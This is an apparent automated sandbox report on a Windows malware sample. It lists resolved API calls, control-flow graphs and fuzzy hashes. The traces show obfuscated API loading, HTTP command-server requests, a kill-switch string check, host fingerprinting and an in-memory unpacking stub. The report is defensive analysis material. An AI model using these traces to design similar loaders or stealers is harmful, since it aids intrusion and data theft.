                      • GetProcAddress.KERNEL32(74DD0000,0251CBD0), ref: 00419CA7
                      • GetProcAddress.KERNEL32(74DD0000,02519990), ref: 00419CBF
                      • GetProcAddress.KERNEL32(74DD0000,0251CB88), ref: 00419CD7
                      • GetProcAddress.KERNEL32(74DD0000,0251CBA0), ref: 00419CF0
                      • GetProcAddress.KERNEL32(74DD0000,0251CBB8), ref: 00419D08
                      • GetProcAddress.KERNEL32(74DD0000,0251CBE8), ref: 00419D20
                      • GetProcAddress.KERNEL32(74DD0000,025150E8), ref: 00419D39
                      • GetProcAddress.KERNEL32(74DD0000,02514E48), ref: 00419D51
                      • GetProcAddress.KERNEL32(74DD0000,02515108), ref: 00419D69
                      • GetProcAddress.KERNEL32(74DD0000,02515128), ref: 00419D82
                      • GetProcAddress.KERNEL32(74DD0000,0251CC00), ref: 00419D9A
                      • GetProcAddress.KERNEL32(74DD0000,0254C6A8), ref: 00419DB2
                      • GetProcAddress.KERNEL32(74DD0000,02519940), ref: 00419DCB
                      • GetProcAddress.KERNEL32(74DD0000,02515148), ref: 00419DE3
                      • GetProcAddress.KERNEL32(74DD0000,0254C4C8), ref: 00419DFB
                      • GetProcAddress.KERNEL32(74DD0000,0254C420), ref: 00419E14
                      • GetProcAddress.KERNEL32(74DD0000,0254C5D0), ref: 00419E2C
                      • GetProcAddress.KERNEL32(74DD0000,0254C5E8), ref: 00419E44
                      • GetProcAddress.KERNEL32(74DD0000,025151E8), ref: 00419E5D
                      • GetProcAddress.KERNEL32(74DD0000,0254C648), ref: 00419E75
                      • GetProcAddress.KERNEL32(74DD0000,0254C588), ref: 00419E8D
                      • GetProcAddress.KERNEL32(74DD0000,0254C468), ref: 00419EA6
                      • GetProcAddress.KERNEL32(74DD0000,0254C480), ref: 00419EBE
                      • GetProcAddress.KERNEL32(74DD0000,0254C450), ref: 00419ED6
                      • GetProcAddress.KERNEL32(74DD0000,0254C438), ref: 00419EEF
                      • GetProcAddress.KERNEL32(74DD0000,0254C660), ref: 00419F07
                      • GetProcAddress.KERNEL32(74DD0000,0254C4E0), ref: 00419F1F
                      • GetProcAddress.KERNEL32(74DD0000,0254C510), ref: 00419F38
                      • GetProcAddress.KERNEL32(74DD0000,02519300), ref: 00419F50
                      • GetProcAddress.KERNEL32(74DD0000,0254C678), ref: 00419F68
                      • GetProcAddress.KERNEL32(74DD0000,0254C618), ref: 00419F81
                      • GetProcAddress.KERNEL32(74DD0000,02514F08), ref: 00419F99
                      • GetProcAddress.KERNEL32(74DD0000,0254C6C0), ref: 00419FB1
                      • GetProcAddress.KERNEL32(74DD0000,02515208), ref: 00419FCA
                      • GetProcAddress.KERNEL32(74DD0000,0254C5A0), ref: 00419FE2
                      • GetProcAddress.KERNEL32(74DD0000,0254C630), ref: 00419FFA
                      • GetProcAddress.KERNEL32(74DD0000,02514E28), ref: 0041A013
                      • GetProcAddress.KERNEL32(74DD0000,02514E68), ref: 0041A02B
                      • LoadLibraryA.KERNEL32(0254C6D8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                      • LoadLibraryA.KERNEL32(0254C6F0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                      • LoadLibraryA.KERNEL32(0254C5B8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                      • LoadLibraryA.KERNEL32(0254C600,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                      • LoadLibraryA.KERNEL32(0254C690,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                      • LoadLibraryA.KERNEL32(0254C708,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                      • LoadLibraryA.KERNEL32(0254C498,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                      • LoadLibraryA.KERNEL32(0254C570,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                      • GetProcAddress.KERNEL32(75290000,02515348), ref: 0041A0DA
                      • GetProcAddress.KERNEL32(75290000,0254C4F8), ref: 0041A0F2
                      • GetProcAddress.KERNEL32(75290000,0251CC60), ref: 0041A10A
                      • GetProcAddress.KERNEL32(75290000,0254C4B0), ref: 0041A123
                      • GetProcAddress.KERNEL32(75290000,025154E8), ref: 0041A13B
                      • GetProcAddress.KERNEL32(73B40000,025199B8), ref: 0041A160
                      • GetProcAddress.KERNEL32(73B40000,02515368), ref: 0041A179
                      • GetProcAddress.KERNEL32(73B40000,02519670), ref: 0041A191
                      • GetProcAddress.KERNEL32(73B40000,0254C540), ref: 0041A1A9
                      • GetProcAddress.KERNEL32(73B40000,0254C528), ref: 0041A1C2
                      • GetProcAddress.KERNEL32(73B40000,02515508), ref: 0041A1DA
                      • GetProcAddress.KERNEL32(73B40000,025153E8), ref: 0041A1F2
                      • GetProcAddress.KERNEL32(73B40000,0254C558), ref: 0041A20B
                      • GetProcAddress.KERNEL32(752C0000,02515288), ref: 0041A22C
                      • GetProcAddress.KERNEL32(752C0000,02515308), ref: 0041A244
                      • GetProcAddress.KERNEL32(752C0000,0254C750), ref: 0041A25D
                      • GetProcAddress.KERNEL32(752C0000,0254C720), ref: 0041A275
                      • GetProcAddress.KERNEL32(752C0000,02515448), ref: 0041A28D
                      • GetProcAddress.KERNEL32(74EC0000,02519A58), ref: 0041A2B3
                      • GetProcAddress.KERNEL32(74EC0000,02519788), ref: 0041A2CB
                      • GetProcAddress.KERNEL32(74EC0000,0254C780), ref: 0041A2E3
                      • GetProcAddress.KERNEL32(74EC0000,02515328), ref: 0041A2FC
                      • GetProcAddress.KERNEL32(74EC0000,02515388), ref: 0041A314
                      • GetProcAddress.KERNEL32(74EC0000,025199E0), ref: 0041A32C
                      • GetProcAddress.KERNEL32(75BD0000,0254C7C8), ref: 0041A352
                      • GetProcAddress.KERNEL32(75BD0000,02515408), ref: 0041A36A
                      • GetProcAddress.KERNEL32(75BD0000,0251CD90), ref: 0041A382
                      • GetProcAddress.KERNEL32(75BD0000,0254C768), ref: 0041A39B
                      • GetProcAddress.KERNEL32(75BD0000,0254C7E0), ref: 0041A3B3
                      • GetProcAddress.KERNEL32(75BD0000,02515468), ref: 0041A3CB
                      • GetProcAddress.KERNEL32(75BD0000,025155C8), ref: 0041A3E4
                      • GetProcAddress.KERNEL32(75BD0000,0254C798), ref: 0041A3FC
                      • GetProcAddress.KERNEL32(75BD0000,0254C738), ref: 0041A414
                      • GetProcAddress.KERNEL32(75A70000,02515488), ref: 0041A436
                      • GetProcAddress.KERNEL32(75A70000,0254C7B0), ref: 0041A44E
                      • GetProcAddress.KERNEL32(75A70000,0254CDE0), ref: 0041A466
                      • GetProcAddress.KERNEL32(75A70000,0254CCF0), ref: 0041A47F
                      • GetProcAddress.KERNEL32(75A70000,0254CD20), ref: 0041A497
                      • GetProcAddress.KERNEL32(75450000,025154A8), ref: 0041A4B8
                      • GetProcAddress.KERNEL32(75450000,025152A8), ref: 0041A4D1
                      • GetProcAddress.KERNEL32(75DA0000,025153C8), ref: 0041A4F2
                      • GetProcAddress.KERNEL32(75DA0000,0254CDF8), ref: 0041A50A
                      • GetProcAddress.KERNEL32(6F070000,025153A8), ref: 0041A530
                      • GetProcAddress.KERNEL32(6F070000,02515428), ref: 0041A548
                      • GetProcAddress.KERNEL32(6F070000,025154C8), ref: 0041A560
                      • GetProcAddress.KERNEL32(6F070000,0254CC18), ref: 0041A579
                      • GetProcAddress.KERNEL32(6F070000,02515528), ref: 0041A591
                      • GetProcAddress.KERNEL32(6F070000,02515548), ref: 0041A5A9
                      • GetProcAddress.KERNEL32(6F070000,025152E8), ref: 0041A5C2
                      • GetProcAddress.KERNEL32(6F070000,02515568), ref: 0041A5DA
                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                      • GetProcAddress.KERNEL32(75AF0000,0254CD68), ref: 0041A629
                      • GetProcAddress.KERNEL32(75AF0000,0251CD80), ref: 0041A641
                      • GetProcAddress.KERNEL32(75AF0000,0254CCC0), ref: 0041A659
                      • GetProcAddress.KERNEL32(75AF0000,0254CE10), ref: 0041A672
                      • GetProcAddress.KERNEL32(75D90000,02515588), ref: 0041A693
                      • GetProcAddress.KERNEL32(6E3B0000,0254CD08), ref: 0041A6B4
                      • GetProcAddress.KERNEL32(6E3B0000,02515228), ref: 0041A6CD
                      • GetProcAddress.KERNEL32(6E3B0000,0254CC30), ref: 0041A6E5
                      • GetProcAddress.KERNEL32(6E3B0000,0254CB28), ref: 0041A6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                      • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                      • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                      • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1019 406364-406392 HttpOpenRequestA 1015->1019 1016->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1013 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1029 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1029 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                      • StrCmpCA.SHLWAPI(?,0251CF40), ref: 00406303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0254DDD0,00000000,00000000,00400100,00000000), ref: 00406385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                      • InternetCloseHandle.WININET(00000000), ref: 004064EF
                      • InternetCloseHandle.WININET(00000000), ref: 004064F9
                      • InternetCloseHandle.WININET(00000000), ref: 00406503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3074848878-2509457195
                      • Opcode ID: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                      • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                      • Opcode Fuzzy Hash: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                      • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1092 4118c0-4118c3 1074->1092 1093 4118ca 1074->1093 1094 4118e2-4118e5 1075->1094 1095 4118ec 1075->1095 1076->1070 1096 411904-411907 1077->1096 1097 41190e 1077->1097 1102 411964-411967 1078->1102 1103 41196e 1078->1103 1105 411983-411986 1079->1105 1106 41198d 1079->1106 1098 411930 1080->1098 1099 411926-411929 1080->1099 1100 411945-411948 1081->1100 1101 41194f 1081->1101 1082->1070 1088 411870-411873 1083->1088 1089 41187a 1083->1089 1090 411892-41189c 1084->1090 1091 41189e-4118a1 1084->1091 1088->1089 1089->1070 1109 4118a8 1090->1109 1091->1109 1092->1093 1093->1070 1094->1095 1095->1070 1096->1097 1097->1070 1098->1070 1099->1098 1100->1101 1101->1070 1102->1103 1103->1070 1105->1106 1106->1070 1109->1070
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcessstrtok_s
                      • String ID: block
                      • API String ID: 3407564107-2199623458
                      • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                      • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                      • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                      • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1290 415ac3-415ac6 1160->1290 1163 4157da-41585f call 41aad0 StrCmpCA 1161->1163 1164 4156bc-4156c3 1161->1164 1183 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1163->1183 1184 415865-41586c 1163->1184 1168 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1164->1168 1169 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1164->1169 1168->1163 1169->1163 1267 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1169->1267 1183->1290 1190 415872-415879 1184->1190 1191 41598f-415a14 call 41aad0 StrCmpCA 1184->1191 1198 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1190->1198 1199 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1190->1199 1219 415a16-415a21 Sleep 1191->1219 1220 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1191->1220 1198->1191 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1198->1296 1199->1191 1219->1127 1220->1290 1267->1163 1296->1191
                      APIs
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                        • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                        • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleepstrtok
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3630751533-2791005934
                      • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                      • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                      • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                      • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                      • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                      • wsprintfA.USER32 ref: 00417640
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\
                      • API String ID: 3790021787-3809124531
                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                      • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                      • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1344 410003c-4100047 1345 4100049 1344->1345 1346 410004c-4100263 call 4100a3f call 4100e0f call 4100d90 VirtualAlloc 1344->1346 1345->1346 1361 4100265-4100289 call 4100a69 1346->1361 1362 410028b-4100292 1346->1362 1367 41002ce-41003c2 VirtualProtect call 4100cce call 4100ce7 1361->1367 1364 41002a1-41002b0 1362->1364 1366 41002b2-41002cc 1364->1366 1364->1367 1366->1364 1373 41003d1-41003e0 1367->1373 1374 41003e2-4100437 call 4100ce7 1373->1374 1375 4100439-41004b8 VirtualFree 1373->1375 1374->1373 1377 41005f4-41005fe 1375->1377 1378 41004be-41004cd 1375->1378 1381 4100604-410060d 1377->1381 1382 410077f-4100789 1377->1382 1380 41004d3-41004dd 1378->1380 1380->1377 1386 41004e3-4100505 LoadLibraryA 1380->1386 1381->1382 1387 4100613-4100637 1381->1387 1384 41007a6-41007b0 1382->1384 1385 410078b-41007a3 1382->1385 1388 41007b6-41007cb 1384->1388 1389 410086e-41008be LoadLibraryA 1384->1389 1385->1384 1390 4100517-4100520 1386->1390 1391 4100507-4100515 1386->1391 1392 410063e-4100648 1387->1392 1394 41007d2-41007d5 1388->1394 1398 41008c7-41008f9 1389->1398 1395 4100526-4100547 1390->1395 1391->1395 1392->1382 1393 410064e-410065a 1392->1393 1393->1382 1397 4100660-410066a 1393->1397 1399 4100824-4100833 1394->1399 1400 41007d7-41007e0 1394->1400 1396 410054d-4100550 1395->1396 1403 41005e0-41005ef 1396->1403 1404 4100556-410056b 1396->1404 1405 410067a-4100689 1397->1405 1407 4100902-410091d 1398->1407 1408 41008fb-4100901 1398->1408 1406 4100839-410083c 1399->1406 1401 41007e2 1400->1401 1402 41007e4-4100822 1400->1402 1401->1399 1402->1394 1403->1380 1409 410056d 1404->1409 1410 410056f-410057a 1404->1410 1411 4100750-410077a 1405->1411 1412 410068f-41006b2 1405->1412 1406->1389 1413 410083e-4100847 1406->1413 1408->1407 1409->1403 1414 410059b-41005bb 1410->1414 1415 410057c-4100599 1410->1415 1411->1392 1416 41006b4-41006ed 1412->1416 1417 41006ef-41006fc 1412->1417 1418 4100849 1413->1418 1419 410084b-410086c 1413->1419 1427 41005bd-41005db 1414->1427 1415->1427 1416->1417 1421 410074b 1417->1421 1422 41006fe-4100748 1417->1422 1418->1389 1419->1406 1421->1405 1422->1421 1427->1396
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0410024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: 1f1b4817e393a1654b028197b1b74e4fed037c11bc88bf1b133dbce70df896d2
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: 41527974A01229DFDB64CF58D984BACBBB1BF09304F1580E9E54DAB391DB70AA84DF14

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251DB40), ref: 004198A1
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251DB58), ref: 004198BA
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251DCD8), ref: 004198D2
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251DCC0), ref: 004198EA
